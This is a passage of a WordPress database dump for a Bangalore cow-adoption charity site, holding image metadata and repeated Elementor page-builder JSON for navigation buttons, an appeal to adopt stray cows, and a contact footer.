0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11401,1896,'_wp_attached_file','2022/10/GOPALAK-COIN-2.0.png'),(11402,1896,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:28:\"2022/10/GOPALAK-COIN-2.0.png\";s:8:\"filesize\";i:525613;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"GOPALAK-COIN-2.0-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51996;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"GOPALAK-COIN-2.0-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18705;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"GOPALAK-COIN-2.0-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:272820;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"GOPALAK-COIN-2.0-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57751;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2.0-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4248;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"GOPALAK-COIN-2.0-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10846;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2.0-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4051;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:26:\"GOPALAK-COIN-2.0-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4051;}s:22:\"elementor_custom_75x75\";a:4:{s:4:\"file\";s:80:\"elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11403,1897,'_elementor_edit_mode','builder'),(11404,1897,'_elementor_template_type','wp-page'),(11405,1897,'_elementor_version','3.7.8'),(11406,1897,'_wp_page_template','elementor_canvas'),(11407,1897,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11408,1897,'_elementor_page_assets','a:0:{}'),(11409,1898,'_elementor_edit_mode','builder'),(11410,1898,'_elementor_template_type','wp-page'),(11411,1898,'_elementor_version','3.7.8'),(11412,1898,'_wp_page_template','elementor_canvas'),(11413,1898,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11414,1898,'_elementor_page_assets','a:0:{}'),(11415,1899,'_elementor_edit_mode','builder'),(11416,1899,'_elementor_template_type','wp-page'),(11417,1899,'_elementor_version','3.7.8'),(11418,1899,'_wp_page_template','elementor_canvas'),(11419,1899,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11420,1899,'_elementor_page_assets','a:0:{}'),(11422,1900,'_elementor_edit_mode','builder'),(11423,1900,'_elementor_template_type','wp-page'),(11424,1900,'_elementor_version','3.7.8'),(11425,1900,'_wp_page_template','elementor_canvas'),(11426,1900,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp